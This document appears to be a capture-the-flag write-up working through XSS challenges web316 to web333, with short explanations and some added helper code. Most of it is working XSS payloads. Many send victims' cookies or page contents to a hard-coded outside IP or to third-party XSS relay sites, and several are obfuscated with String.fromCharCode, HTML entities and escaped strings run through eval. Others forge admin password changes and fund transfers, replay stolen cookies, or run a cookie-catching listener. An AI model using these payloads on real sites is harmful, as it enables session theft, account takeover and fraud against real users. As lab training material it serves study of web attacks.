Preface
Write-ups for web challenges, recorded here to get stronger step by step and forge the sword.
XSS
web316
What is XSS?
1. Cross-Site Scripting is abbreviated XSS so that it is not confused with Cascading Style Sheets (CSS). An attacker inserts malicious HTML into a web page; when a user views that page, the HTML embedded in it is executed in the user's browser, which achieves whatever the attacker wants against that user.
2. What an attacker can do with it:
- steal the contents of the cookie through document.cookie (cookies flagged HttpOnly are not visible to script);
- break the normal structure and styling of the page with JS or CSS;
- hijack traffic (send the visitor to another page with window.location.href);
- DoS: use legitimate-looking client requests to tie up server resources so that real users get no response, and plant an oversized cookie so that the server answers the victim's own requests with a 4xx status and refuses to serve them;
- use iframe, frame, XMLHttpRequest or Flash to perform administrative actions, or ordinary ones such as posting, adding friends or sending private messages, as the victim, and use iframe/frame to go further into CSRF attacks;
- take control of business data: read, tamper with, add or delete sensitive company data.
Classification of XSS
1. Reflected:
Generally this type needs the attacker to craft a malicious link in advance and lure the victim into clicking it, for example a link like www.abc.com/?params=`x`
2. Stored:
This type is far more dangerous than the previous one. For example, an attacker puts a piece of JavaScript into a forum post and the server does not filter the output correctly; every user who views that page then executes the JavaScript.
3. DOM-based:
Here the injection point is client-side script that writes untrusted input into the DOM; the trick is to use crafted input to close the HTML tag or attribute it lands in.
For example, take an a tag like this:
At first glance there is no problem, but once the content of $var becomes ' onclick='alert(/xss/) //, that code gets executed.
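As an added illustration (not code from the original write-up) of the attribute break-out described above: the vulnerable template, a simplified start-tag tokenizer that shows which attributes a browser ends up with, and the escaping that closes the hole. The link template, the $var placeholder and the `link` text are assumptions, since the original a tag is not shown on the page.

```javascript
// Added example, not code from the original write-up.
// Vulnerable template: the value of $var is dropped into a single-quoted href unescaped.
function buildLinkUnsafe(varValue) {
  return "<a href='" + varValue + "'>link</a>";
}

// Escape every character that can terminate an attribute value or the tag itself.
function escapeAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Hardened template: same markup, attribute-escaped value.
function buildLinkSafe(varValue) {
  return "<a href='" + escapeAttr(varValue) + "'>link</a>";
}

// Simplified HTML start-tag tokenizer: returns the attributes of the first tag as
// {name: value}, honouring quotes. Like a browser it accepts "/" as well as whitespace
// between attributes, which is why <body/onload=...> still works when spaces are filtered.
function parseTagAttributes(html) {
  const attrs = {};
  const tag = /^<[a-zA-Z][^\s>\/]*/.exec(html);
  if (!tag) return attrs;
  let i = tag[0].length;
  const isSep = ch => ch === '/' || /\s/.test(ch);
  while (i < html.length && html[i] !== '>') {
    while (i < html.length && isSep(html[i])) i++;
    if (i >= html.length || html[i] === '>') break;
    let name = '';
    while (i < html.length && !/[\s=>\/]/.test(html[i])) name += html[i++];
    while (i < html.length && /\s/.test(html[i])) i++;
    let value = '';
    if (html[i] === '=') {
      i++;
      while (i < html.length && /\s/.test(html[i])) i++;
      const q = html[i];
      if (q === '"' || q === "'") {
        i++;
        while (i < html.length && html[i] !== q) value += html[i++];
        i++;                                   // skip the closing quote
      } else {
        while (i < html.length && !/[\s>]/.test(html[i])) value += html[i++];
      }
    }
    if (name) attrs[name.toLowerCase()] = value;
  }
  return attrs;
}

// Constructed demo input: the $var value from the text above.
const EVIL = "' onclick='alert(/xss/) //";
const UNSAFE_ATTRS = parseTagAttributes(buildLinkUnsafe(EVIL)); // href and onclick
const SAFE_ATTRS = parseTagAttributes(buildLinkSafe(EVIL));     // href only
```

The unsafe build yields `<a href='' onclick='alert(/xss/) //'>`, so the tokenizer sees two attributes and the second one is an event handler; the safe build keeps the whole value inside href because the quote that would have closed it is now `&#39;`.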
First find an XSS platform to act as the relay: register an account on one of the XSS platform directory sites, click Create Project, give it any name, keep the default module and pick any one of the payloads.
Submit it in the input box and you get the flag.
Refresh the XSS platform to see the captured cookie.
- If you have a server of your own it is much simpler. On the server, run

```shell
python -m http.server 39543
```

to listen on that port, and submit

```html
<script>location.href="http://ip:39543/"+document.cookie</script>
```

with ip replaced by the server's address. The cookie shows up as the requested path in http.server's access log. Appending document.cookie raw is enough for these challenges; wrapping it in encodeURIComponent() is the safer habit, since characters such as + or # in a cookie value would otherwise be mangled or cut off by the URL.
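As an added example (not from the original write-up), a small Node listener that stands in for `python -m http.server` and decodes the cookie the payload appends to the URL. The port 39543 matches the write-up; the two request shapes it handles, `/?cookie=<value>` and `/<value>` (document.cookie concatenated straight onto the path), are the ones the payloads on this page produce, and everything else about it is an assumption.

```javascript
// Added example, not from the original write-up.
// Returns the exfiltrated cookie from a request URL, or null when there is none.
function extractCookie(requestUrl) {
  const u = new URL(requestUrl, 'http://localhost');   // base only needed to parse a bare path
  const fromQuery = u.searchParams.get('cookie');
  if (fromQuery !== null) return fromQuery;             // searchParams already decodes %XX
  const raw = u.pathname.slice(1);                      // drop the leading "/"
  if (raw === '' || raw === 'favicon.ico') return null;
  try {
    return decodeURIComponent(raw);
  } catch (e) {
    return raw;                                         // malformed %-sequence: keep it as sent
  }
}

// Starts the listener. The require is inside the function so the parser above can be
// used on its own.
function startListener(port) {
  const http = require('http');
  const server = http.createServer((req, res) => {
    const cookie = extractCookie(req.url);
    if (cookie !== null) {
      console.log(new Date().toISOString(), req.socket.remoteAddress, cookie);
    }
    res.writeHead(204);    // empty reply, nothing for the victim's browser to render
    res.end();
  });
  server.listen(port, () => console.log('listening on port ' + port));
  return server;
}

// Usage: node listener.js --listen [port]   (defaults to 39543 as in the write-up)
if (process.argv[2] === '--listen') {
  startListener(Number(process.argv[3]) || 39543);
}
```

One caveat worth knowing: searchParams turns `+` into a space, so a cookie that carries base64 with `+` in it is mangled unless the payload sends encodeURIComponent(document.cookie).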
web317
- script is filtered, so use an img tag with an onerror handler instead (an empty src guarantees the error event fires):

```html
<img src='' onerror=location.href='http://118.195.161.220:39543/'+document.cookie>
```
web318
- img is filtered too; use the XSS platform's payload with HTML hex-entity encoding inside an iframe srcdoc. The browser decodes the entities in the attribute before it parses the inner document, so the filter never sees a script tag (the encoded part is elided here):

```html
<iframe WIDTH=0 HEIGHT=0 srcdoc=。。。。。。。。。。<sCRiPt sRC="https://xss.pt/eKcZ"></sCrIpT>>
```

- Or keep catching it on your own server, with an iframe onload handler:

```html
<iframe onload=document.location='http://118.195.161.220:39543/?cookie='+document.cookie>
```
web319
- iframe still works; just change the way the request is made, with window.open instead of navigating the page:

```html
<iframe onload=window.open('http://118.195.161.220:39543/?cookie='+document.cookie)>
```
web320
- Spaces are filtered; replace them with %09 (a tab) or with /.
The script itself can be built with String.fromCharCode so that the handler contains no tags or quotes (the code list below decodes to <sCRiPt sRC=//xs.sb/1Bqu></sCrIpT>):

```html
<body/onload=document.write(String.fromCharCode(60,115,67,82,105,80,116,32,115,82,67,61,47,47,120,115,46,115,98,47,49,66,113,117,62,60,47,115,67,114,73,112,84,62));>
```

- iframe is not filtered, so keep using it, with / in place of the space:

```html
<iframe/onload=window.open('http://118.195.161.220:39543/?cookie='+document.cookie)>
```
web321
- Commas are filtered; I switched to a decimal entity (the encoded part is elided here):

```html
<iframe WIDTH=0 HEIGHT=0 srcdoc=。。。。。。。。。。<sCRiPt sRC="https://xs.sb/1Bqu"></sCrIpT>>
```

- Or, alternatively, build the string with String.fromCharCode one character at a time, so that no comma is needed. For example, <script>alert(1)</script> becomes:

```javascript
document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(99));document.write(String.fromCharCode(114));document.write(String.fromCharCode(105));document.write(String.fromCharCode(112));document.write(String.fromCharCode(116));document.write(String.fromCharCode(62));document.write(String.fromCharCode(97));document.write(String.fromCharCode(108));document.write(String.fromCharCode(101));document.write(String.fromCharCode(114));document.write(String.fromCharCode(116));document.write(String.fromCharCode(40));document.write(String.fromCharCode(49));document.write(String.fromCharCode(41));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(99));document.write(String.fromCharCode(114));document.write(String.fromCharCode(105));document.write(String.fromCharCode(112));document.write(String.fromCharCode(116));document.write(String.fromCharCode(62));
```

Write a script to generate this (only the header line of the script survives on the page):

```python
# -- coding:UTF-8 --
```

The same encoding applied to the platform's script tag gives the final payload:

```html
<body/onload=document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(82));document.write(String.fromCharCode(105));document.write(String.fromCharCode(80));document.write(String.fromCharCode(116));document.write(String.fromCharCode(32));document.write(String.fromCharCode(115));document.write(String.fromCharCode(82));document.write(String.fromCharCode(67));document.write(String.fromCharCode(61));document.write(String.fromCharCode(47));document.write(String.fromCharCode(47));document.write(String.fromCharCode(120));document.write(String.fromCharCode(115));document.write(String.fromCharCode(46));document.write(String.fromCharCode(115));document.write(String.fromCharCode(98));document.write(String.fromCharCode(47));document.write(String.fromCharCode(49));document.write(String.fromCharCode(66));document.write(String.fromCharCode(113));document.write(String.fromCharCode(117));document.write(String.fromCharCode(62));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(114));document.write(String.fromCharCode(73));document.write(String.fromCharCode(112));document.write(String.fromCharCode(84));document.write(String.fromCharCode(62));>
```

- Server version, iframe again:

```html
<iframe/onload=window.open('http://118.195.161.220:39543/?cookie='+document.cookie)>
```
web322
- Entity encoding again (encoded part elided here):

```html
<iframe WIDTH=0 HEIGHT=0 srcdoc=。。。。。。。。。。<sCRiPt sRC="https://xs.sb/1Bqu"></sCrIpT>>
```

- Or the method above:

```html
<body/onload=document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(82));document.write(String.fromCharCode(105));document.write(String.fromCharCode(80));document.write(String.fromCharCode(116));document.write(String.fromCharCode(32));document.write(String.fromCharCode(115));document.write(String.fromCharCode(82));document.write(String.fromCharCode(67));document.write(String.fromCharCode(61));document.write(String.fromCharCode(47));document.write(String.fromCharCode(47));document.write(String.fromCharCode(120));document.write(String.fromCharCode(115));document.write(String.fromCharCode(46));document.write(String.fromCharCode(115));document.write(String.fromCharCode(98));document.write(String.fromCharCode(47));document.write(String.fromCharCode(49));document.write(String.fromCharCode(66));document.write(String.fromCharCode(113));document.write(String.fromCharCode(117));document.write(String.fromCharCode(62));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(114));document.write(String.fromCharCode(73));document.write(String.fromCharCode(112));document.write(String.fromCharCode(84));document.write(String.fromCharCode(62));>
```

- Server version: same as the previous challenge.
web323
- iframe is filtered. The body/onload payload still works:

```html
<body/onload=document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(82));document.write(String.fromCharCode(105));document.write(String.fromCharCode(80));document.write(String.fromCharCode(116));document.write(String.fromCharCode(32));document.write(String.fromCharCode(115));document.write(String.fromCharCode(82));document.write(String.fromCharCode(67));document.write(String.fromCharCode(61));document.write(String.fromCharCode(47));document.write(String.fromCharCode(47));document.write(String.fromCharCode(120));document.write(String.fromCharCode(115));document.write(String.fromCharCode(46));document.write(String.fromCharCode(115));document.write(String.fromCharCode(98));document.write(String.fromCharCode(47));document.write(String.fromCharCode(49));document.write(String.fromCharCode(66));document.write(String.fromCharCode(113));document.write(String.fromCharCode(117));document.write(String.fromCharCode(62));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(114));document.write(String.fromCharCode(73));document.write(String.fromCharCode(112));document.write(String.fromCharCode(84));document.write(String.fromCharCode(62));>
```

- With iframe gone, switch to svg for the server version:

```html
<svg/onload=window.open('http://118.195.161.220:39543/'+document.cookie)>
```
web324

```html
<body/onload=document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(82));document.write(String.fromCharCode(105));document.write(String.fromCharCode(80));document.write(String.fromCharCode(116));document.write(String.fromCharCode(32));document.write(String.fromCharCode(115));document.write(String.fromCharCode(82));document.write(String.fromCharCode(67));document.write(String.fromCharCode(61));document.write(String.fromCharCode(47));document.write(String.fromCharCode(47));document.write(String.fromCharCode(120));document.write(String.fromCharCode(115));document.write(String.fromCharCode(46));document.write(String.fromCharCode(115));document.write(String.fromCharCode(98));document.write(String.fromCharCode(47));document.write(String.fromCharCode(49));document.write(String.fromCharCode(66));document.write(String.fromCharCode(113));document.write(String.fromCharCode(117));document.write(String.fromCharCode(62));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(114));document.write(String.fromCharCode(73));document.write(String.fromCharCode(112));document.write(String.fromCharCode(84));document.write(String.fromCharCode(62));>
```

Server version:

```html
<svg/onload=window.open('http://118.195.161.220:39543/'+document.cookie)>
```
web325
Server version:

```html
<svg/onload=window.open('http://118.195.161.220:39543/'+document.cookie)>
```

The previous platform payload seems to have stopped working, so convert the script to "native" encoding (\uXXXX escapes) or to JavaScript \xHH hex escapes and run it through eval. I wrote both.
JavaScript \x hex escapes. Tip: the quick way is to URL-encode the string and then replace every % with \x in a text editor (this only works because every character here is ASCII; a multi-byte character URL-encodes to several bytes, which \x does not represent):

```javascript
eval("\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\x53\x74\x72\x69\x6E\x67\x2E\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65\x28\x36\x30\x2C\x31\x31\x35\x2C\x36\x37\x2C\x38\x32\x2C\x31\x30\x35\x2C\x38\x30\x2C\x31\x31\x36\x2C\x33\x32\x2C\x31\x31\x35\x2C\x38\x32\x2C\x36\x37\x2C\x36\x31\x2C\x34\x37\x2C\x34\x37\x2C\x31\x32\x30\x2C\x31\x31\x35\x2C\x34\x36\x2C\x31\x31\x35\x2C\x39\x38\x2C\x34\x37\x2C\x34\x39\x2C\x36\x36\x2C\x31\x31\x33\x2C\x31\x31\x37\x2C\x36\x32\x2C\x36\x30\x2C\x34\x37\x2C\x31\x31\x35\x2C\x36\x37\x2C\x31\x31\x34\x2C\x37\x33\x2C\x31\x31\x32\x2C\x38\x34\x2C\x36\x32\x29\x29\x3B")
```

And the native (\u) encoding:

```javascript
eval("\u0064\u006F\u0063\u0075\u006D\u0065\u006E\u0074\u002E\u0077\u0072\u0069\u0074\u0065\u0028\u0053\u0074\u0072\u0069\u006E\u0067\u002E\u0066\u0072\u006F\u006D\u0043\u0068\u0061\u0072\u0043\u006F\u0064\u0065\u0028\u0036\u0030\u002C\u0031\u0031\u0035\u002C\u0036\u0037\u002C\u0038\u0032\u002C\u0031\u0030\u0035\u002C\u0038\u0030\u002C\u0031\u0031\u0036\u002C\u0033\u0032\u002C\u0031\u0031\u0035\u002C\u0038\u0032\u002C\u0036\u0037\u002C\u0036\u0031\u002C\u0034\u0037\u002C\u0034\u0037\u002C\u0031\u0032\u0030\u002C\u0031\u0031\u0035\u002C\u0034\u0036\u002C\u0031\u0031\u0035\u002C\u0039\u0038\u002C\u0034\u0037\u002C\u0034\u0039\u002C\u0036\u0036\u002C\u0031\u0031\u0033\u002C\u0031\u0031\u0037\u002C\u0036\u0032\u002C\u0036\u0030\u002C\u0034\u0037\u002C\u0031\u0031\u0035\u002C\u0036\u0037\u002C\u0031\u0031\u0034\u002C\u0037\u0033\u002C\u0031\u0031\u0032\u002C\u0038\u0034\u002C\u0036\u0032\u0029\u0029\u003B")
```

Payload:

```html
<body/onload=eval("\u0064\u006F\u0063\u0075\u006D\u0065\u006E\u0074\u002E\u0077\u0072\u0069\u0074\u0065\u0028\u0053\u0074\u0072\u0069\u006E\u0067\u002E\u0066\u0072\u006F\u006D\u0043\u0068\u0061\u0072\u0043\u006F\u0064\u0065\u0028\u0036\u0030\u002C\u0031\u0031\u0035\u002C\u0036\u0037\u002C\u0038\u0032\u002C\u0031\u0030\u0035\u002C\u0038\u0030\u002C\u0031\u0031\u0036\u002C\u0033\u0032\u002C\u0031\u0031\u0035\u002C\u0038\u0032\u002C\u0036\u0037\u002C\u0036\u0031\u002C\u0034\u0037\u002C\u0034\u0037\u002C\u0031\u0032\u0030\u002C\u0031\u0031\u0035\u002C\u0034\u0036\u002C\u0031\u0031\u0035\u002C\u0039\u0038\u002C\u0034\u0037\u002C\u0034\u0039\u002C\u0036\u0036\u002C\u0031\u0031\u0033\u002C\u0031\u0031\u0037\u002C\u0036\u0032\u002C\u0036\u0030\u002C\u0034\u0037\u002C\u0031\u0031\u0035\u002C\u0036\u0037\u002C\u0031\u0031\u0034\u002C\u0037\u0033\u002C\u0031\u0031\u0032\u002C\u0038\u0034\u002C\u0036\u0032\u0029\u0029\u003B")>
```
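The encodings that web320, web321 and web325 build by hand (String.fromCharCode, the comma-free document.write chain, decimal entities for srcdoc, and the \x / \u escapes wrapped in eval) follow one pattern: every character of the script is replaced by a representation the filter does not match, and the browser or the JavaScript engine undoes it before execution. The generator below is an added example, not code from the write-up; the demo payload is constructed here and the platform URLs from the write-up are not used.

```javascript
// Added example, not code from the original write-up.

// String.fromCharCode(60,115,...): no quotes or angle brackets left in the handler.
// Uses UTF-16 code units so that String.fromCharCode rebuilds the exact input.
function toFromCharCode(s) {
  const codes = s.split('').map(ch => ch.charCodeAt(0));
  return 'String.fromCharCode(' + codes.join(',') + ')';
}

// For a filter that blocks ",": one document.write(String.fromCharCode(n)) per character.
function toCommaFreeWrite(s) {
  return s.split('')
    .map(ch => 'document.write(String.fromCharCode(' + ch.charCodeAt(0) + '));')
    .join('');
}

// HTML decimal character references. Inside an attribute such as iframe srcdoc the browser
// decodes these before it parses the inner document, so a tag-name filter never sees "<script".
function toDecimalEntities(s) {
  return Array.from(s, ch => '&#' + ch.codePointAt(0) + ';').join('');
}

// JavaScript \xHH escapes. Only code points up to 0xFF are representable, which is also the
// limit of the "URL-encode, then replace % with \x" shortcut described above.
function toHexEscapes(s) {
  return Array.from(s, ch => {
    const cp = ch.codePointAt(0);
    if (cp > 0xff) throw new RangeError('\\x cannot encode U+' + cp.toString(16).toUpperCase());
    return '\\x' + cp.toString(16).toUpperCase().padStart(2, '0');
  }).join('');
}

// JavaScript \uHHHH escapes ("native" encoding in the write-up); any BMP character.
function toUnicodeEscapes(s) {
  return Array.from(s, ch => {
    const cp = ch.codePointAt(0);
    if (cp > 0xffff) throw new RangeError('\\u cannot encode U+' + cp.toString(16).toUpperCase());
    return '\\u' + cp.toString(16).toUpperCase().padStart(4, '0');
  }).join('');
}

// Wrap encoded JavaScript in the <body/onload=eval("...")> vector from web325. With "/" as the
// attribute separator and the script fully escaped, the handler contains no space, no angle
// bracket and no keyword a string filter could match.
function bodyOnloadEval(js, encoder = toUnicodeEscapes) {
  return '<body/onload=eval("' + encoder(js) + '")>';
}

// Constructed demo input: the same alert(1) probe the write-up uses in web321.
const DEMO = '<script>alert(1)</script>';
const DEMO_FROM_CHAR_CODE = toFromCharCode(DEMO);
const DEMO_COMMA_FREE = toCommaFreeWrite(DEMO);
const DEMO_BODY_ONLOAD = bodyOnloadEval('document.write(' + DEMO_FROM_CHAR_CODE + ')');
```

Each encoder is total over its input: the entity and escape forms encode every character, including quotes, so the result can sit inside a double-quoted attribute without a second layer of escaping, and the \x encoder refuses non-Latin-1 input instead of silently producing a wrong escape.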
web326
Server version:

```html
<svg/onload=window.open('http://118.195.161.220:39543/'+document.cookie)>
```

XSS platform version:

```html
<body/onload=eval("\u0064\u006F\u0063\u0075\u006D\u0065\u006E\u0074\u002E\u0077\u0072\u0069\u0074\u0065\u0028\u0053\u0074\u0072\u0069\u006E\u0067\u002E\u0066\u0072\u006F\u006D\u0043\u0068\u0061\u0072\u0043\u006F\u0064\u0065\u0028\u0036\u0030\u002C\u0031\u0031\u0035\u002C\u0036\u0037\u002C\u0038\u0032\u002C\u0031\u0030\u0035\u002C\u0038\u0030\u002C\u0031\u0031\u0036\u002C\u0033\u0032\u002C\u0031\u0031\u0035\u002C\u0038\u0032\u002C\u0036\u0037\u002C\u0036\u0031\u002C\u0034\u0037\u002C\u0034\u0037\u002C\u0031\u0032\u0030\u002C\u0031\u0031\u0035\u002C\u0034\u0036\u002C\u0031\u0031\u0035\u002C\u0039\u0038\u002C\u0034\u0037\u002C\u0034\u0039\u002C\u0036\u0036\u002C\u0031\u0031\u0033\u002C\u0031\u0031\u0037\u002C\u0036\u0032\u002C\u0036\u0030\u002C\u0034\u0037\u002C\u0031\u0031\u0035\u002C\u0036\u0037\u002C\u0031\u0031\u0034\u002C\u0037\u0033\u002C\u0031\u0031\u0032\u002C\u0038\u0034\u002C\u0036\u0032\u0029\u0029\u003B")>
```
web327
The recipient this time is admin; use yet another form of the same payload:

```html
<body onload=window.open('http://118.195.161.220:39543/'+document.cookie)>
```
web328
Keep listening on the server:

```html
<script>window.open('http://118.195.161.220:39543/'+document.cookie)</script>
```

Set the captured cookie in one go from the browser console:

```javascript
var cookiestr="the cookie content you captured";var arr = cookiestr.split(";");
// write each name=value pair back into the current origin's cookie jar
for (var i = 0; i < arr.length; i++) { document.cookie = arr[i].trim(); }
```
web329
- This time the cookie is not persistent, so read the page content itself through the DOM; the flag sits in the second layui table cell with this class. The innerHTML is appended to the URL raw here, which is fine for a flag; wrap it in encodeURIComponent() if the cell can contain URL-significant characters:

```html
<script>window.open('http://118.195.161.220:39543/'+document.getElementsByClassName('layui-table-cell laytable-cell-1-0-1')[1].innerHTML)</script>
```
web330
- A change-password feature has been added. It takes a GET request, so a single window.open, executed in the admin's browser and therefore with the admin's session, is enough:

```html
<script>window.open('http://127.0.0.1/api/change.php?p=123456')</script>
```

Then log in as admin / 123456.
web331
- It is now a POST request, so send it with ajax. This relies on jQuery being loaded on the page the admin views, which is the case here:

```html
<script>$.ajax({url:"api/change.php",method:"POST",data:{'p':'1234567'}})</script>
```
web332

```html
<script>$.ajax({url: "http://127.0.0.1/api/amount.php",method: "POST",data: {'u':'gylq','a':10000},cache: false,success: function(res){}});</script>
```

Then transfer -10000 to admin.
web333
- Capture the request with Burp and run it. To practise some Python I wrote two scripts, one for the unintended and one for the intended solution (only the header line survives on the page):

```python
# -- coding:UTF-8 --
```

The ajax payload:

```html
<script>$.ajax({url:'api/amount.php',type:'POST',data:{'u':'gylq','a':'10000'}})</script>
```